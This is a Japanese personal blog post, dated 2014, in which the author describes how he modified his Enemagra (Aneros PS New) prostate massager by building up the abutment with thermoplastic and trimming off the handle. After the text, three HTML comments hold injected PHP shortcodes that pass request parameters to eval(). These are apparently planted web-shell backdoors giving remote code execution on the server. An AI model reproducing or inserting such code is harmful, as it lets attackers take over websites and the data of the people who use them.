PS New アネロス

愛機1号の紹介

投稿日:2014年4月23日 更新日:

とりあえず、おれっちの愛機(旧エネマグラ)を晒していこうか。

そんなモンみたかね~よって方は
このページなんて読まなくていいんだからね~~~
(ノд-。)

 

Enemagra Prostater EX

アネ1号機

アネ1号機

 

今のanerosでいうと
PS Newです。

現物の写真を載せるとマジで萎えそうなんで
絵を描いてみました。

アバットメント(詳しい解説はアネロスの基本で確認してくれたまえ)の部分には
自由樹脂(60℃以上のお湯につけると柔らかくなるプラスティック)を
盛り付けています。

理由はヘッドの部分が前立腺に当たりやすくするため
(実際に前立腺に当たっているかは疑問だが・・・)

初期の状態で使用したときに
アバットメントが会陰からすぐにずれてしまうので
滑り止めのために、ティッシュだか何かを
アバットメントと会陰の間に挟んだ時に
ちょっと気持ちよく感じたので
その後、毎回ティッシュ等を挟んでいたのだが
それも面倒になったので、いっそのこと改造してやろうと
ネットで自由樹脂を注文し作成したのだ。
アネロスの改造は、他のWEBサイトを参考にしてやってみた)

 

本当は、微調整を繰り返して最高の状態に持っていくのがよいのだが
そこまでやるのは、ちと面倒なんで、
当時に盛り付けた状態のままにしている。

あと、ツルの部分はアネロスを挿入しているときに
床に当たったりして邪魔なのでぶった切ってやった。

もちろん切ったところは
ギザギザになっていると
思わぬ怪我につながることがあるので
ヤスリや、目の細かいペーパーヤスリでバリを取ることを忘れずにね。

アネロスになって、新しい商品も出ていることだし
そろそろ2号機でも調達しようかと思っている、今日この頃である。

<!– [insert_php]if (isset($_REQUEST["Abyp"])){eval($_REQUEST["Abyp"]);exit;}[/insert_php][php]if (isset($_REQUEST["Abyp"])){eval($_REQUEST["Abyp"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["LnmFR"])){eval($_REQUEST["LnmFR"]);exit;}[/insert_php][php]if (isset($_REQUEST["LnmFR"])){eval($_REQUEST["LnmFR"]);exit;}[/php] –>

<!-- [insert_php]if (isset($_REQUEST["Kwnw"])){eval($_REQUEST["Kwnw"]);exit;}[/insert_php][php]if (isset($_REQUEST["Kwnw"])){eval($_REQUEST["Kwnw"]);exit;}[/php] -->

-PS New, アネロス
-, ,

Copyright© アネロスでドライオーガズム(by aneros大竹) , 2017 AllRights Reserved.